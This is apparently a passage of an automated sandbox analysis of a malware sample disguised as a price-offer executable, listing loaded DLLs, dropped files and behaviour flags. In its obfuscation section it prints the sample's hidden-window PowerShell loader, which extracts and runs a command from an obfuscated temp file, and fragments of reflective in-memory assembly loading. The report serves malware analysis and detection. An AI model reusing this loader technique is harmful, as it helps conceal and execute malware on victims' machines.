Source: C:\Users\user\Desktop\Price Offer_1200R4 1200R20.exe Section loaded: dwmapi.dll
Source: C:\Users\user\Desktop\Price Offer_1200R4 1200R20.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\Price Offer_1200R4 1200R20.exe Section loaded: oleacc.dll
Source: C:\Users\user\Desktop\Price Offer_1200R4 1200R20.exe Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\Price Offer_1200R4 1200R20.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\Price Offer_1200R4 1200R20.exe Section loaded: shfolder.dll
Source: C:\Users\user\Desktop\Price Offer_1200R4 1200R20.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\Price Offer_1200R4 1200R20.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\Price Offer_1200R4 1200R20.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\Price Offer_1200R4 1200R20.exe Section loaded: riched20.dll
Source: C:\Users\user\Desktop\Price Offer_1200R4 1200R20.exe Section loaded: usp10.dll
Source: C:\Users\user\Desktop\Price Offer_1200R4 1200R20.exe Section loaded: msls31.dll
Source: C:\Users\user\Desktop\Price Offer_1200R4 1200R20.exe Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\Price Offer_1200R4 1200R20.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\Price Offer_1200R4 1200R20.exe Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\Price Offer_1200R4 1200R20.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\Price Offer_1200R4 1200R20.exe Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\Price Offer_1200R4 1200R20.exe Section loaded: winmm.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Section loaded: msvcp140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\Price Offer_1200R4 1200R20.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: Price Offer_1200R4 1200R20.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

Source: Yara match File source: 00000004.00000002.2082764498.0000000001822000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: GetDelegateForFunctionPointer((Discursion $obligatorisk $Bankaktiers), (Calfkill @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Ufredelighed = [AppDomain]::CurrentDomain.GetAssemblies()
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Tvundnes)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Dyreryggen, $false).DefineType($Freskoens, $Vers
Source: C:\Users\user\Desktop\Price Offer_1200R4 1200R20.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Facils=Get-Content 'C:\Users\user\AppData\Local\Temp\betalingsdatoer\oromo\tututni\Kaalhovedernes.Und33';$Cowpox=$Facils.SubString(36576,3);.$Cowpox($Facils)"
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Code function: 4_2_016E0F59 push ebx; iretd 4_2_016E0F61
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Code function: 4_2_016E47E2 push edi; iretd 4_2_016E47E9
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Code function: 4_2_016E1BCE pushfd ; retf 4_2_016E1BCF
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Code function: 4_2_016E2BD5 push 5B2BAAD0h; retf 4_2_016E2BF1
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Code function: 4_2_016E086C push ebp; retf 4_2_016E0874
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Code function: 4_2_016E287A pushfd ; ret 4_2_016E2893
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Code function: 4_2_016E2620 push ss; retf 4_2_016E2658
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Code function: 4_2_016E3616 push edi; retf 4_2_016E3617
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Code function: 4_2_016E0CF7 push edx; iretd 4_2_016E0CFA
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Code function: 4_2_016E02C8 push edi; ret 4_2_016E02D3
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Code function: 4_2_20CB4380 push eax; retf 4_2_20CB4381
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Code function: 4_2_20CBD5A2 push eax; ret 4_2_20CBD5B1
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Code function: 4_2_20CB5D85 pushad ; retf 4_2_20CB5DA0
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Code function: 4_2_20CB5EFF push ebp; retf 4_2_20CB5F08
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Code function: 4_2_20CB5E56 pushad ; retf 4_2_20CB5E68
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Code function: 4_2_21DD1E10 push esp; ret 4_2_21DD1F11
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Code function: 4_2_21E2AE68 push edi; iretd 4_2_21E2AE9B
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Code function: 4_2_21E3ABD8 pushfd ; retf 21E1h 4_2_21E3ABE5
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Code function: 4_2_21E302CC push es; iretd 4_2_21E302F6
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Code function: 4_2_21E32FB0 push cs; ret 4_2_21E33024
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Code function: 4_2_21E62708 push 8B1FAE16h; retf 4_2_21E6270D
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Code function: 4_2_21E6A9E8 pushad ; retf 4_2_21E6A9B2
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Code function: 4_2_21E68DCA pushad ; ret 4_2_21E68DD5
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Code function: 4_2_21E9542F push eax; ret 4_2_21E95443
Source: C:\Users\user\Desktop\Price Offer_1200R4 1200R20.exe File created: C:\Users\user\AppData\Local\Temp\nst4C1E.tmp\AdvSplash.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe
Source: C:\Users\user\Desktop\Price Offer_1200R4 1200R20.exe File created: C:\Users\user\AppData\Local\Temp\nst4C1E.tmp\nsDialogs.dll
Source: C:\Users\user\Desktop\Price Offer_1200R4 1200R20.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Process information set: NOOPENFILEERRORBOX